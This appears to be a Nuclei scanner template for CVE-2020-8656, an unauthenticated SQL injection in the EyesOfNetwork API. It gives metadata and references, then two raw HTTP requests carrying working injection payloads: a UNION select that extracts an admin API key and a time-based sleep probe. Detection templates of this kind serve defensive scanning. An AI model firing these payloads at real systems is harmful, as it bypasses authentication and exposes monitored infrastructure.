id: CVE-2020-8656 info: name: EyesOfNetwork - Hardcoded API Key & SQL Injection author: ritikchaddha severity: critical description: | An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php. impact: | Unauthenticated attackers can bypass authentication via SQL injection and gain access to the EyesOfNetwork monitoring system and all monitored infrastructure data. remediation: | Apply security patches or update to the latest version of EyesOfNetwork. reference: - https://www.exploit-db.com/exploits/48025 - https://nvd.nist.gov/vuln/detail/CVE-2020-8656 - https://github.com/EyesOfNetworkCommunity/eonapi/issues/17 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-8656 epss-score: 0.81824 epss-percentile: 0.99216 cwe-id: CWE-798 cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: eyesofnetwork product: eyesofnetwork fofa-query: title="EyesOfNetwork" tags: cve,cve2020,eyesofnetwork,hardcoded-key,sqli,vuln,vkev http: - raw: - | GET /eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet HTTP/1.1 Host: {{Hostname}} - | @timeout: 20s GET /eonapi/getApiKey?username=%27%20union%20select%20sleep(6),0,0,0,0,0,0,0%20or%20%27 HTTP/1.1 Host: {{Hostname}} stop-at-first-match: true matchers-condition: or matchers: - type: dsl dsl: - 'status_code_1 == 200' - 'contains(body_1, "EONAPI_KEY")' condition: and - type: dsl dsl: - 'duration_2>=6' - 'status_code_2 == 401' - 'contains_all(body_2, "api_version", "username-password credentials")' condition: and # digest: 490a0046304402200aeefacfdf07f52717ff693071fffc1cb12fdd0d7d42e120835cd0ef7bb81aa502207cb7f878940a98c179be0637d71b456fa3347de4b7588dbbef5ba51d60cea16d:922c64590222798bb761d5b6d8e72950